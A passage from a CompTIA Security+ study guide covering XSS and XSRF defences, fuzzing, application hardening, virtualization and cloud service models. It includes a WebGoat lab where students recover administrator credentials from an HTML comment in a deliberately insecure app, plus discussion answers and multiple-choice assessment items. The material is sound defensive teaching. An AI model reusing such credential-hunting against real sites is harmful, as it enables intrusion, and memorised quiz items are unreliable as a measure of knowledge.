Neither prepared statements nor stored procedures are perfect proof against injection attacks, and when
implemented badly they might actually hurt security. You still need to perform input validation, and carefully
manage permissions when servers and processes communicate with each other.

XSS prevention
Cross-side scripting attacks are dangerous because they can potentially allow an attacker to take full control
of a victim's browser, doing whatever it can do. This doesn't just let them mess with stored browser data or
client computer resources, it also allows them to attack web applications they're logged onto, using the
victim's privileges.
Static and reflected XSS attacks can be prevented by server-side validation and sanitization. Creating
effective filters requires an in-depth knowledge of XSS techniques, but OWASP gives the following basic
guidelines.

1. Never insert untrusted data except in allowed locations.


2. Apply HTML escapes before inserting untrusted data into HTML element contents.
3. Apply attribute escapes before inserting untrusted data into HTML common attributes.
4. Apply JavaScript escapes before inserting untrusted data into HTML JavaScript data values.
5. Apply CSS escapes and strict validation before inserting untrusted data into HTML style property values.
6. Apply URL escapes before inserting untrusted data into HTML URL parameters values.
7. Use a sanitizing library specially designed to parse and clean HTML input.
These rules aren't easy to perfectly nail down, so it's also good practice to implement risk mitigation
techniques. One recommended method is to set the HTTPOnly flag on your session cookies and any other
custom cookies that aren't directly accessed by your JavaScript.
DOM-based XSS attacks require a different strategy, since the malicious code works entirely within the
victim's browser and may never be seen by the server. Validation has to be performed by carefully designed
client-side scripts. Alternative approaches include blocking scripts on client browsers, or using intrusion
protection on either the client or the server to recognize signatures of an attack.

XSRF prevention
Cross-site request forgery is a distinct attack from XSS, and requires different protections. Typically, XSRF
(or CSRF) relies on a malicious link or message that inserts code into the victim's browser, causing it to

346 CompTIA Security+ Exam SY0-501


Chapter 7: Securing network services / Module A: Securing applications

perform unwanted actions on a legitimate site the victim is already authenticated on. XSS prevention can't
directly stop this, though it can be used to circumvent XSRF protections, so it's important to do both in
concert.
Some developers have tried to prevent XRSF through means such as secret cookies, multi-step transactions,
URL rewriting, or restricting transactions to HTTP POST requests, but those are all ineffective or easy to
bypass. A more effective route is synchronizer tokens, cryptographically secure random tokens valid only for
a single session. Other methods include checking referer headers and origin headers, or requiring direct
human input such as CAPTCHA or re-authentication using a typed password.

Exercise: Finding vulnerable code


In this exercise, you'll review code and validation features in WebGoat.
Do This How & Why

1. In the Dojo VM, start WebGoat. WebGoat is a deliberately insecure web application OWASP
uses to demonstrate application vulnerabilities.

After a few moments, WebGoat opens in Firefox.


a) Click > Targets > WebGoat
NG Start

b) Sign in with user name guest and The main application opens.
password guest

2. Review a login page for developer Web page source code shouldn't have any sensitive
comments. information, but since it's hidden from most users many
developers don't think much about it.

a) In the navigation pane, click Code This is a login page for a web application. Attackers know to
Quality > Discover Clues in the review source code for comments that suggest backdoors or
HTML. weaknesses they can search for.

b) Right-click the User Name field The Developer Tools Page Inspector pane below the page. It
and click Inspect Element. shows the page source code.

c) Point in the left pane of the Page


Inspector.

As you point to each line in the Inspector, a blue box


surrounds the corresponding element on the page itself.

CompTIA Security+ Exam SY0-501 347


Chapter 7: Securing network services / Module A: Securing applications

Do This How & Why

d) Scroll up until you find the You'll know you're pointing at it when the highlight box
<form> tag in the Inspector. surrounds the entire "Sign In" form on the page.

The developer left a FIXME comment including what looks


like administrator credentials.

e) Close the Developer Tools pane. Click Close at the corner of the pane.

f) Sign in with user name admin and


password adminpw

The credentials work, meaning that anyone who thinks to read


the page source code has a backdoor into the application.
Before this goes into production you'll need to review all the
application code for similar issues.

3. Test input validation in a web form. To secure a web application, you need to minimize the chance
of bad input causing unexpected behavior. One example of this
is making sure all form fields only accept valid responses.

a) In the navigation pane, click This page has seven form fields, each with unique formatting
Parameter Tampering > Bypass requirements. According to your database administrator, badly
Client Side JavaScript formatted data reaching the back-end database could be very
Validation. harmful. This means it's essential that a malicious user can't
enter anything inappropriate.

b) For each field on the form, enter You can save some time by just copying and pasting some
something that doesn't match the invalid special characters for each field, such as "@!*.
instructions.

c) Click Submit.

A JavaScript error message appears, showing that the web


page itself recognized the bad data. You could use this to block
form input, but since attackers can bypass JavaScript it would
only protect against user errors.

348 CompTIA Security+ Exam SY0-501


Chapter 7: Securing network services / Module A: Securing applications

Do This How & Why

d) Click OK. To close the error window. The page also reports that server
side validation detected all seven errors. If your error handling
code is up to snuff the bad data won't reach the database.

Application testing
A robust testing process is important to make sure that applications are not only functional but secure.
Important steps include:

Exam Objective: CompTIA SY0-501 3.6.6

Static analysis Examination of source code for potential problems, security or otherwise. This can
include manual code review by programmers, automated static code analyzers, or ideally
a combination of both.
Dynamic analysis Runtime analysis of a program that has been compiled and executed. It can include
examination of overall system performance from within the operating system, testing
input, and analyzing output. Some dynamic analysis uses human testers, and some uses
automated tools.
Stress testing Testing of an application or system's functions under strenuous conditions likely to
create problems. Stress testing often deliberately exceeds intended load capacities, or
induces errors to test error handling systems.
Model verification For mission-critical applications, the sort where failure might cause catastrophic damage,
even a stress test and traditional verification of software meeting design requirements
might not be enough. Model checking is an exhaustive test of every possible state of the
application to find all possibilities for critical errors. Model checking can be difficult and
expensive, and the more possible states the program can have the more complex
checking becomes.

In general, you don't want to test programs on production systems, or really anywhere they could compromise
production systems. Depending on the stage of the project you're testing in, a better practice is a test or
staging environment with appropriate sandboxing protections.

Code quality
When developing a secure application you don't only need to make sure you used secure principles in its
development. You also need to make sure there aren't unpleasant mistakes hiding in its implementation,
whether they're because of programmer error or malicious modification.

Exam Objective: CompTIA SY0-501 3.6.3, 3.6.5.7, 3.6.5.8, 3.6.5.11


One of the biggest risks in secure applications is including code written by someone else without knowing
exactly what is in it. Third-party code libraries or software development kits (SDKs) is one of the best ways to
save time when developing a program. After all, why write and debug a new code module when a finished
product is already available? If you're careful this is not a problem, but many third-party libraries have serious
unpatched vulnerabilities, especially if you don't use the most recent version. Some may not even be publicly
disclosed. The more secure your product must be, the more carefully you must review any third-party content
you include.
Even reusing code you've written before can be a problem. It's not bad in itself, since if you have previously
written a function or library that almost matches what you need, you can save a lot of labor and opportunity
for new errors by reusing it. The problem is that if you're careless, you can introduce new vulnerabilities. For

CompTIA Security+ Exam SY0-501 349


Chapter 7: Securing network services / Module A: Securing applications

example, copying over more code than is actually needed results in dead code that exists within the
application but isn't called on for any normal functions. If you're lucky, dead code only makes the program
larger, but it can lead to security issues too. Injection attacks and other exploits can force dead code to be
executed, and even if that never happens the larger program size makes it harder to perform code review and
find vulnerabilities.
It's also easy for vulnerabilities to sneak into applications due to problems in the change management process,
especially when iterative development models or when there's poor communication between different
developers. Changes might be applied without adequate review, or bug fixes might accidentally be
overwritten by an older version. As development progresses, needlessly duplicated code or dead code might
accumulate. A formal change management process including version control software and regular code review
is essential for coordinating development.
Code review isn't easy, not only because of potential bugs, but because inside attackers commonly use
obfuscation to make malicious or exploitable code look harmless to a reviewer. It's especially easy if the code
wasn't clearly formatted to start, but even well-structured code can be rearranged to hide a vulnerability. More
ambitious obfuscation techniques involve self-generating code that behaves in unexpected ways at runtime, or
heavy compression that makes reverse engineering of binaries difficult.

Note: Obfuscating code can be useful for making programs more secure, by making it difficult for
attackers to analyze or reverse engineer your work. This can be effective, but makes code review more
difficult even if you know exactly what obfuscations were made.

Fuzzing
Input validation for any application is easy to begin but difficult to master, and in any case it needs to be
tested. One of the best ways is fuzz testing, or fuzzing—using an automated program to send random inputs to
the application, then seeing what happens. If the application isn't properly secured, fuzzing can cause it to
crash, produce other unexpected behavior, or even generate interesting error messages that reveal too much
about your security configuration. If you don't perform sufficient fuzzing, and correct the problems it reveals,
attackers will use their own fuzzing tools against your application sooner or later.
There are multiple types of fuzzing, depending on the type of application being tested.

Application fuzzing Tests I/O functions for the application. On a web application, this would mean URLs,
forms, Remote Procedure Calls (RPCs), and user-generated content.
Protocol fuzzing Sends forged, modified, replayed, or otherwise non-standard packets to a network
application.
File format fuzzing Creates and saves randomly formatted file samples to be opened and parsed by an
application.

Fuzzing has a lot of advantages. It's simple to do, and since it doesn't require any presumptions about how the
application works it's suitable as a black-box testing technique. It also can catch a lot of problems human
testers tend to miss. That said, it's not a replacement for human testing either, since it only tends to find fairly
simple errors.

Provisioning
Once a web application or other network service has been tested thoroughly, actually deploying it is called
provisioning. Provisioning isn't just a matter of installing software. It describes the whole process of getting
your application and everything else needed to support it assembled and accessible to users. It can include
several aspects.

Exam Objective: CompTIA SY0-501 3.6.4

 Network provisioning is making sure that network resources are available to support the services being
offered, and making sure that they are accessible to users.

350 CompTIA Security+ Exam SY0-501


Chapter 7: Securing network services / Module A: Securing applications

 Server provisioning is setting up a server to host an application or service: configuring an operating


system, security controls, and the application itself along with all supporting software.
 User provisioning is the creation and maintenance of user accounts and attributes, such as permissions
and available services. It may be specific to an application, or part of a central identity management
scheme within the organization.
 Deprovisioning is the orderly freeing up of resources that have been provisioned. It can refer to the
removal of unused services and readying systems and networks for other purposes, but especially in the
security sense it most importantly means removing access whenever a user has permissions revoked.

Automated provisioning software is available to help with application deployment. In particular, user
provisioning software is a popular way to manage users for network applications and services.

Hardening applications
In principle, hardening a web application isn't much different from hardening hosts and user applications. It
has most of the same steps, after all. The difference is that the stakes are typically higher, you're more likely
to face intelligent human attackers over the network, and code vulnerabilities are more likely to be your fault.
Even that isn't a big change: with any sort of hardening process, how careful and paranoid you need to be
depends on the level of risk.
Before you harden an application you need to determine a security baseline policy detailing the requirements
and principles you need to keep risks acceptable, and to check against during later security audits or
configuration updates.

1. Harden the underlying host and network.


• Ensure the host is kept updated.
• Disable unnecessary applications, services, and user accounts.
• Apply antivirus and HIDS/HIPS software on the host.
• Protect the network with firewalls, NIDS/NIPS, or even specific web application firewalls.
• If the application uses multiple servers, for example one for the web server and one for the database,
make sure all of them are suitably hardened.
2. Securely configure the application.
• Choose securely coded applications using secure protocols.
• Make sure that application components and users operate in a least privilege environment.
• Apply secure client-side validation features.
• Apply special protections against likely attack vectors.
3. Thoroughly test the application before deploying it.
• Use a combination of human testing and fuzzing techniques for best results.
• For critical applications, consider outside security audits or penetration tests.
4. Maintain the deployed application's security over time.
• Conduct regular security audits.
• Use a rigorous patch management process to update host and application software without introducing
new vulnerabilities.
• Educate users to prevent attacks relying on social engineering.
• Be aware of constantly evolving network application threats.

CompTIA Security+ Exam SY0-501 351


Chapter 7: Securing network services / Module A: Securing applications

Discussion: Securing applications


1. Perform a web search for "SQL injection" and find a news article about a real-world data breach. What
does it say about the attacked site?
Answers may vary, but it probably held a lot of valuable data and had very few security controls.
2. Why should you use client-side validation as well as server-side?
Even though server-side validation is more secure, client-side works more quickly.
3. How can you protect against SQL injection attacks in fields where all SQL command characters would be
valid?
Sanitize output by adding escape characters. That way the original content is preserved, but the database
won't mistake the field for a query.
4. What's the most central rule for protecting against XSS attacks?
Never insert untrusted data except in allowed locations.
5. For a typical web application, what's the difference between application fuzzing and protocol fuzzing?
Application fuzzing looks for how the application interface responds to random or unexpected input,
while protocol fuzzing looks for how it responds to random or malformed network data.

352 CompTIA Security+ Exam SY0-501


Chapter 7: Securing network services / Module A: Securing applications

Assessment: Securing applications


1. What technique tests an application's responses to random input? Choose the best response.
 Escaping
 Fuzzing
 Sanitization
 Validation

2. What kind of attack do synchronizer tokens help prevent?


 Buffer overflow
 SQL injection
 XSS
 XSRF

3. What does the software assurance process do? Choose the best response.
 Ensure applications are up to date.
 Ensure applications are regularly audited.
 Ensure applications are securely configured.
 Ensure applications are securely designed.

4. You're reviewing a web application. Which of these features are security warning signs? Choose all that
apply.
 Input errors are logged and clearly displayed to users in full detail.
 The web server and database software are on separate physical servers, both similarly secured.
 Input validation is performed more rigorously on the client side than the server side.
 The HTTPOnly flag is set on session cookies.
 Secret cookies are used to prevent XSRF attacks.

5. Even just blocking or sanitizing the < and > characters used by HTML tags can prevent many attacks.
True or false?
 True
 False

6. What DevOps practice keeps code created by multiple developers from diverging or conflicting? Choose
the best response.
 Baselining
 Continuous integration
 Immutable systems
 Infrastructure as code

CompTIA Security+ Exam SY0-501 353


Chapter 7: Securing network services / Module B: Virtual and cloud systems

Module B: Virtual and cloud systems


One of the biggest changes in modern computing is virtualization. Devices, hosts, and even entire networks
increasingly exist only as software which can transparently share, span across, or move between physical
hosts. Closely related is the concept of cloud computing, where previously static and local services are
dynamically allocated from remote data centers. Both can boost efficiency and reduce infrastructure costs for
many organizations, but they also bring new challenges and demands to the network and its security.
You will learn:
 About virtual networks
 About cloud services

About virtualization
"Virtual" is one of those words you hear applied to everywhere today, and it's easy to think if it as a
meaningless buzzword. Sure, sometimes it is, but it's also a number of very real and rapidly advancing
technological developments. Most aren't even really new technologies; it's more that we're currently at a
tipping point where increasingly powerful hardware combined with changing user needs are making
virtualization the solution to more and more problems.
There are a lot of virtualization technologies applying to different technology fields, but the underlying
concept is the same: changing the way users or software see and use a hardware platform by applying
abstraction layers between the two. That way, resources can be combined, distributed, or rearranged without
having to change the underlying physical layout of the system. The concept is pretty familiar in computing,
and networking in particular: it's much like the divide between the physical network and the logical network.
Modern networks use a lot of virtualization technologies, often but not always with "virtual" helpfully in the
name. VLANs allow you to separate the logical topology of a L2 network from its physical topology, VPNs
allow you to simulate private circuits over the internet, and SANs allow you to allocate network-based disk
arrays as though they were local storage. All of them have the same basic goal: achieving desired functions in
a way that's cheaper and more flexible than a traditional hardware-based solution. They're all important, but
another transformative technology is platform virtualization, when host operating systems themselves are
separated from their underlying hardware.

Virtual machines
For decades, computing hardware has grown rapidly cheaper and more powerful, which is good since we
keep finding more use for all that extra processing power. But the two don't always keep pace with each other:
it's common that while there's always a demand for new network services, the use of any particular network
service doesn't grow as fast as hardware speeds. This often means a new server you buy will have many times
the capacity of the one it's replacing, in fact enough to take over the workload of multiple existing servers.
One popular approach is just to combine all those services into the same hardware; sometimes it's a good idea,
like replacing a firewall, router, and NAT with a single device. On the other hand, if the services themselves
aren't closely related it could be technically difficult, or at the least be inflexible for future growth or
maintenance. Another possibility is installing multiple independent virtual servers on the physical server.

Exam Objective: CompTIA SY0-501 3.7.1


You obviously can't just install multiple operating systems on one computer and run them all at once: most of
the point of an operating system is that it controls system resources and allocates them to software
applications. Instead, a virtualized server needs another abstraction layer.

354 CompTIA Security+ Exam SY0-501


Chapter 7: Securing network services / Module B: Virtual and cloud systems

Host The physical hardware that ultimately hosts all the hardware. Not to be confused
with the usual network definition of "host."
Virtual Machine (VM) A virtual computer installed onto the host. To a user or application, or even the
VM itself, it's a normal operating system running on a normal hardware platform,
with its own CPU, memory, storage, and whatever other hardware devices it
needs. The VM's operating system is often called a guest OS.
Hypervisor A software abstraction layer that runs VMs as applications, effectively an
operating system for operating systems. To the VM the hypervisor looks like
underlying hardware, but it's actually just allocating host resources and allowing
multiple VMs to simultaneously share them. Hypervisors themselves can be
broken into two categories.
 Type I (or bare metal) hypervisors install directly on the host hardware and
have full control of it.
 Type II (or hosted) hypervisors install as applications in a normal host
operating system. They're less efficient than the bare metal type, but more
convenient for low-demand applications or test environments.

Virtual servers have a lot of benefits outside of just consolidating more services onto less hardware.
 VMs using different operating systems can share a host without conflicts.
 Maintenance on one VM, like system updates, doesn't need to affect other VMs on the same host.
 VMs are easier to back up, restore, or move to different hardware than traditional operating system
installations.
 It's relatively easy to change or upgrade hardware on hosts without affecting VMs, or to change the
memory or storage allocated to different VMs without hardware changes.

A newer alternative to traditional hypervisor-based system virtualization is container virtualization. Instead of


a bare metal or hosted hypervisor, the computer runs a normal operating system whose kernel can operate as a
sort of hypervisor in itself. The kernel then runs multiple containers. A container is like a VM in that it is
isolated from other containers on the same computer and can even perform relatively low-level operating
system tasks like defining its own file system, but it doesn't have a guest operating system; instead, it shares
the kernel of the host operating system. This reduces flexibility somewhat compared to a hypervisor, but it
increases performance and efficiency.

CompTIA Security+ Exam SY0-501 355


Chapter 7: Securing network services / Module B: Virtual and cloud systems

Virtualization isn't even just for servers; it's useful for desktop workstations as well. A workstation can run
VMs for legacy applications or software testing environments. Alternatively, virtual desktop environments
(VDEs) holding user data and applications can be hosted in a server room and accessed from anywhere on the
network, even from thin clients with limited computing power of their own. If the network's fast enough a
VDE can be as responsive as a normal one from the user's perspective, but the whole virtual desktop
infrastructure (VDI) is actually stored where IT staff can easily support and maintain it.

Virtual applications
The other common form of virtual machine is the kind used for application virtualization. In this method, the
VM is an application that emulates a specific software environment, which itself can be run in theory on any
operating system, and maybe even any hardware whatsoever. This makes things easier for developers since
they don't have to write programs to a single physical architecture, and for users because they can use the
same programs on multiple platforms. A few examples of application virtualization include:
 Java (not to be confused with Javascript) is a virtual platform popular with web, desktop, and mobile
apps. You need to install a version of the Java VM application compatible with your operating system,
but then you in theory can run any Java application with no or little modification.
 More broadly, many web apps are virtual applications which run partly or completely by using modern
web browsers as a VM on the client side. The server side may be a traditional application on an
physical server, or may be within a VM or container. On the client, any standards-compliant web
browser can run the client-side scripts needed.
 Wine is an application that allows you to run many Windows applications on non-Windows operating
systems. While the underlying hardware still must be x86-based, Wine serves as a virtual environment
that makes the application think it's on a Windows computer, and translates between the application and
the host operating system.

Virtual applications have some limitations compared to virtual systems., such as being poorly suited to tasks
that need low-level access to underlying hardware or operating system function. For example, it's particularly
difficult to make an antivirus program or disk scanning utility as a virtual application.

356 CompTIA Security+ Exam SY0-501


Chapter 7: Securing network services / Module B: Virtual and cloud systems

Virtual network devices


A hypervisor has to make sure its VMs share the host's resources without directly interfering with each other.
It allocates CPU time to each while making sure none can dominate it entirely, splits up the host's RAM
space, allocates virtual drives or partitions on the physical hard drive, and so on. Networking can make it
complicated: what happens if all of those VMs need to communicate with each other, or with outside hosts?
Unless the host has a separate physical NIC for each VM, which isn't typical, the hypervisor also needs to
provide network services for its VMs.
To join a network, a VM needs to have a NIC. Instead of a physical one, it has a virtual NIC, existing in
software form. The virtual NIC still has a MAC address, IP address, all the other settings and functions of a
real card, except that instead of sending and receiving physical signals all of its network traffic passes through
the hypervisor. Multiple VNICs can correspond to one physical NIC. At its most basic, the VNIC on a VM
can be configured a few ways.
 On an isolated internal network: the VNIC is assigned an internal IP address, and can communicate
only with the hypervisor and/or other VMs on the same host.
 On an internal subnet: the VNIC is assigned an internal IP address, but the hypervisor performs NAT so
the VM can connect to the outside network.
 As a bridged adapter: the VNIC is assigned an external IP address and joined directly to the outside
network. To outside observers, the VM and host will appear to be different network addresses even
though they share a physical NIC.

If you think about it, that means that at the minimum the hypervisor also has to behave as a virtual switch, and
potentially as a router or NAT. It can also provide firewall functions for security purposes. Or you could go a
step further: since routers and firewalls are essentially network hosts themselves you could install one as a
VM. Many firewall and router vendors today even offer virtual versions of their products.
You don't even have to put all the VMs on the same subnet or broadcast domain in the outside network just
because they share a physical NIC. You can install a virtual switch with VLAN functions, and then configure
the physical NIC as a trunk line from the virtual switch to the physical switch outside—that is, presuming it's
a physical switch: these days you might need to check it out to be sure.

CompTIA Security+ Exam SY0-501 357


Chapter 7: Securing network services / Module B: Virtual and cloud systems

Software-defined networking
Even with VLANs, virtualization, and steadily improving routing and switching protocols, networks keep
getting more complex and harder to manage. Devices need a lot of individual manual configuration, even
when it can be done remotely, and it's hard to keep coordinated, especially when the network mixes devices
from different vendors. It's easy for a physical or logical change in the network structure to have a cascading
effect that hurts performance throughout the system, too. As a result, it's easy for administrators of large
networks to become conservative about any changes even when network needs and usage patterns shift, just
trying to find a static configuration that works, and holding onto it to prevent service disruptions.

Exam Objective: CompTIA SY0-501 3.2.5


An emerging solution to this is known as software-defined networking (SDN), and much like virtualization
technologies it works by adding a new abstraction layer to divide physical and logical functions. Specifically,
it separates the functions of routers, switches, and related devices into two planes.
 The control plane makes decisions about the overall flow of traffic. It encompasses the duties of
routing protocols, switching protocols, QoS settings, and other settings that store or communicate rules
through the network.
 The data plane does the work of moving individual frames and packets through the network. It routes
packets, schedules queues, reads routing tables and ARP values, and so on. It doesn't have to do the
thinking, so to speak, because it's only following orders received from the control plane.

SDN allows administrators to centrally manage the entire network through a network controller that separates
the two planes. The network controller can communicate with upper level SDN applications to govern control
plane functions, and with lower level SDN datapaths to adjust device settings in the data plane.

Note: Like traditional remotely managed network components, SDN controllers use a variety of network
control protocols, and these can be attacked. SDN infrastructure should use secure protocols such as
SNMP v3 and SSH, and individual controllers and devices must be hardened against intrusion.
Alternatively, OOB control can improve security if the network's physical structure makes it convenient.
At present, SDN mostly has found a foothold in complex networks run by large companies and busy data
centers, while most organizations haven't really implemented it yet. Like any network technology, time will
tell just how far it will spread through the industry.

Security benefits of virtualization


Virtual platforms have a number of benefits and applications that help maintain security, especially
availability.

Snapshots It's easy to create a snapshot of a VM—a read-only copy of its disk file and
configuration information, much like a system image or restore point on a physical
host. By creating snapshots before risky activities like updates or installations, you
can easily revert to them if anything goes wrong.
Sandboxing Since a VM can only access host resources through the hypervisor, and doesn't
interact directly with other VMs, it's effectively a sandbox environment isolated from
the rest of the host. While it's not perfect, this means a VM compromised by malware
or another attack is less likely to compromise the host or other VMs. For this reason,
VMs are often used to run untrusted code before allowing it on production systems.
Security control Virtual test environments are an ideal place to thoroughly test security controls before
testing deploying them on the "real" network.
Patch compatibility A test VM is also useful for testing operating system or application patches to make
sure they don't introduce any problems.

358 CompTIA Security+ Exam SY0-501


Chapter 7: Securing network services / Module B: Virtual and cloud systems

Host It's fairly easy to maintain high availability for services hosted on a VM—after all, it's
availability/elasticity easy to transfer the VM if the physical host has problems or needs maintenance. It's
also easy to provide elasticity, or change the resources allocated to the VM based on
its load. If you're expecting a busy day for your web store because a sale just started,
you can give its VM a bigger share of the host, or copy it to add more redundant
systems if you're using load balancing.

Securing virtual systems


For all the security benefits they have, VMs aren't without risk. Most risks to VMs are the same risks physical
hosts face: they can become infected with malware, be targeted by network attacks, have application crashes,
and so on. Naturally, they're also harmed by anything happening to their host.

Exam Objective: CompTIA SY0-501 3.7.2, 3.7.3


A few risks are particular to VMs. Some malware today is designed with virtual systems in mind, and can
perform a VM escape. You might encounter a virus that. can attack the hypervisor from inside the VM, or
more commonly hop from one VM to another. This is especially a risk in container virtualization, since all
containers directly share the same OS kernel. Some malware is even able to detect when it's running in a VM
and stay dormant—that way, you won't notice its effects in untested code until you install it on a physical
host.
Another risk is far more prosaic: people tend to treat VMs as distinct from "real" computers. They're
overlooked when it comes to security, updates, or secure data storage and disposal. This leads to a condition
known as VM sprawl. The most important thing in keeping a secure environment with VMs is to make sure
those disk images are tracked and secured just as well as expensive, visible physical hardware.

 Clearly establish who is responsible for configuring and securing each VM, whether it's in the server
room or a desktop test environment. It's easy for VM sprawl to lead to orphaned VMs everyone thinks
"belongs" to someone else, or for employees to maintain unauthorized and poorly secured VMs that
compromise overall security without administrator knowledge.
 Make sure that all VMs are hardened just like physical hosts would be, with antivirus software and
regularly installed updates.
 When you install multiple VMs hosting important functions on a single host, understand that the
physical host has become a single point of failure for all of them. Secure and maintain it accordingly.
 Ensure that VMs are only used in appropriate security environments.
• VMs should only be connected to network segments matching their security needs.
• VMs with very different security standards or running workloads with different trust levels shouldn't
be run on the same physical host.
• Virtual disk images holding sensitive data need to be secured just as the data itself would be, whether
they're running or not.
• Some hypervisors on compatible hardware allow memory encryption that protects compromised VMs
from affecting others on the same host.
 Virtual network devices and appliances are one of the primary vectors for VM hopping attacks, so they
need to be configured just as securely as physical ones. This is easy to overlook, since they're often seen
as easy preconfigured building blocks.
 Ensure that all VMs running important workloads have enough host resources to maintain service
availability.
 Closely examine regulatory requirements for PII or other sensitive information to see what might restrict
your use of virtualization.

CompTIA Security+ Exam SY0-501 359


Chapter 7: Securing network services / Module B: Virtual and cloud systems

Non-persistent VDI
Traditional system virtualization uses what's called persistent images. You might start a new VM with a copy
of an existing system image, but once you do that it remains in place as long as you use it. Just like if you'd
installed the system image onto a physical computer any changes you make persist. If you have multiple
VMs, that also means you need to apply updates or other configuration changes to all of them individually,
just like if they were physical computers. While you can use documentation and network-based tools to
minimize VM sprawl, it can still be a lot of work managing a large number of virtual workstations in a
persistent VDI deployment. It also can take a lot of storage space storing so many active disk images and their
backups.

Exam Objective: CompTIA SY0-501 3.3.8.3, 8.4.1, 3.8.4.2


One alternative to reduce that work is non-persistent VDI. In that architecture, the central server only stores
one master image (or golden image) of a fully configured computer. Whenever a user logs in, the server starts
a VM that is based on the master image, but which doesn't directly change any of its files or settings. All
changes are applied to a temporary copy or file system instead, and when the user logs out all of the
temporary data is deleted. When the user logs in again, or even when different users log in at the same time,
they each receive a new, generic VM.
Non-persistent desktops don't just save storage space: they also make it easy to apply updates or configuration
changes, and prevent users from making configuration changes that will cause long-term security risks. They
tend to work well for classes of users that only need standard workstations without user customization, such
as call center workers, but not very well for users who have unique configuration or software needs. User
profiles and documents must be items that can be stored separately, if they're needed.
Non-persistent VDI is a rapidly evolving technology. One new development is application layering, where a
given user can have a customized VM that includes all the applications assorted with their user profile,
without the server needing a separate master image for each unique combination of installed applications.
Other applications of non-persistence
VDI is one of the main examples of non-persistence used for security and efficiency, but as a general principle
it's useful in a lot of computing areas. Whether you're using virtualization or not, non-persistence allows you
to make sure you're not preserving unwanted data, configuration changes, or malware, and always beginning
with a clean slate.

Exam Objective: CompTIA SY0-501 3.8.4.3, 3.8.4.4

 A Live CD is a complete bootable operating system placed on a CD, DVD, or other read-only bootable
media. Since the live boot media can't be directly modified it's safe from malware and configuration
changes. It also can be used without affecting any operating systems installed on the computer's
internal storage. Live CDs are commonly used as repair media for malware-infected or otherwise non-
bootable computers, but they can be used for any other purpose their installed software allows.
 The private browsing features used by modern web browsers are a form of non-persistence. While they
won't protect you from malware or other network attacks, they prevent malicious or sensitive data from
being stored permanently in your browser cache. When you close private mode, all data regarding your
browsing session is purged.
 Many applications and operating systems allow you to take configuration snapshots, or even do so
automatically when you make configuration changes. By making a snapshot of a security baseline you
can revert to that known state or configuration when you suspect any problems.

Note: Reverting to a known state might not work in some cases, such as using Windows
System Restore to undo harm caused by a malware infection, so it's not as complete as a true
non-persistence solution.

360 CompTIA Security+ Exam SY0-501


Chapter 7: Securing network services / Module B: Virtual and cloud systems

Discussion: Virtual hosts


1. What server roles have you seen that could benefit from being placed on a VM in one physical server?
Answers may vary, but could include DHCP servers, authentication servers, or many others. It's less
about specific server roles and more about low-demand servers maintained as separate VMs on the same
hardware.
2. What kind of hypervisor does this course's virtual lab environment use?
Unless setup has been changed, it's host-based.
3. How could virtualization help you maintain host security?
Answers may vary, but it allows sandboxed test environments, high availability systems, and easy
configuration backups.
4. What's the most common security risk of virtual hosts?
Answers may vary, but the most important is that instead of being treated like "real" computers they're
overlooked when it comes to security, updates, or secure data storage and disposal.
5. What forms of non-persistence have you used?
Answers may vary, but private browsing is one of the most common.

Cloud services
Another of those terms you hear everywhere today is "the cloud," generally describing some sort of online
service. While cloud metaphors and illustrations have been used to describe the uncertain topology of WANs
for ages, cloud computing actually means a more specific style of service model for online services that's been
rapidly growing in recent years, and the technologies that support it. In the simplest explanation, cloud
services allow individuals and businesses to share resources in third party data centers. As a vague concept
that isn't very new: time-sharing on mainframes was sold before the Internet even existed, and network
hosting services have been around a long time, but virtualization and high-speed Internet connections have
given the idea new levels of power and flexibility. In practice, a cloud service has some significant differences
from a traditional hosted service you might purchase in a third-party data center, and even more from on-
premise services you would place in your own server room.

Exam Objective: CompTIA SY0-501 3.7.6


Since cloud computing is more a service model than a specific technology, it's easiest to define it in terms of
the service features it offers. In 2011, the National Institute of Standards and Technology (NIST) made the
closest thing to a universally accepted definition.
“"Cloud computing is a model for enabling ubiquitous, convenient, on-demand network access to a shared
pool of configurable computing resources (e.g., networks, servers, storage, applications, and services) that can
be rapidly provisioned and released with minimal management effort or service provider interaction."”
Further, the NIST defines five elements which a cloud computing service must have.

On-demand self-service Customers must be able to access computing resources unilaterally and
automatically, without human interaction with the service provider.
Broad network access Resources are available through the network in a standard format that allows and
in fact promotes use from a wide variety of client platforms, often including any
sort of computer or mobile device.
Resource pooling The provider's resources are pooled and shared between multiple customers in a
multi-tenant fashion, and can be dynamically allocated to suit changing demands.
As much as possible, the customer doesn't even need to know where the resources
are hosted: they just work wherever you are.

CompTIA Security+ Exam SY0-501 361


Chapter 7: Securing network services / Module B: Virtual and cloud systems

Rapid elasticity Resources can be quickly, even automatically, allocated or released to meet
demand. From a customer perspective, resources might seem to be unlimited.
Measured service Resources are in some way measured and metered, so that usage can be monitored
and transparently reported, and so that the customer can be billed appropriately.
The exact means of measurement can depend on the type of service: processing
time, storage space, active users, or bandwidth usage.

It's worth noticing that none of these definitions actually specifies virtualization. That's not an oversight; as
much as cloud services are seen as a virtualization technology, it's not because they by definition have to be.
It's only that virtualization is an incredibly useful technology for giving the dynamic flexibility cloud
providers need to offer. In fact, one of the defining points of virtualization is that it aims to make itself as
transparent as possible to the end user.

Cloud models
The NIST definitions also included three service models for cloud computing, each describing a category of
provider offering.

Exam Objective: CompTIA SY0-501 3.7.4, 3.7.5

Software-as-a-service Subscription-based access to applications or databases, sometimes known as


"on-demand software." This shouldn't be confused with locally installed
software that has a subscription-based license: SaaS is centrally installed in the
provider's data center, and users can access it using a client application or web
browser. It's popular with enterprise software vendors of all types: SaaS
applications can be almost anything: popular categories include office,
accounting, CRM, management tools, and even antivirus software. To the
customer, SaaS might have user accounts and settings, but it's not locally
installed and visible files like normal software, and the provider handles
maintenance and support. Pricing is usually either a subscription fee or pay-by-
use. In technical terms, SaaS applications are usually built either as web
applications designed to run in the browser with a combination of server-side
and client-side code, or as web services applications which use Simple Object
Access Protocol (SOAP) and eXtensible Markup Language (XML) over HTTP
to allow two devices, like a server and a mobile application, to communicate
and perform tasks.
Platform-as-a-service Access to a computing platform or software environment the customer can use
to develop and host web-based applications. PaaS can be used to develop
applications for the customer to offer as their own Internet service, or it can be
used for internal applications. Either way, the provider manages the underlying
hardware infrastructure and development tools, so the customer has to do only
the actual software development. On the technical level, PaaS uses the same
tools as SaaS, but instead of a complete application it supplies the underlying
servers, databases, and other pieces customers need to develop their own
applications.
Infrastructure-as-a-service Access to computing and network resources themselves, such as storage
devices, processing, entire computers, and even whole networks. The customer
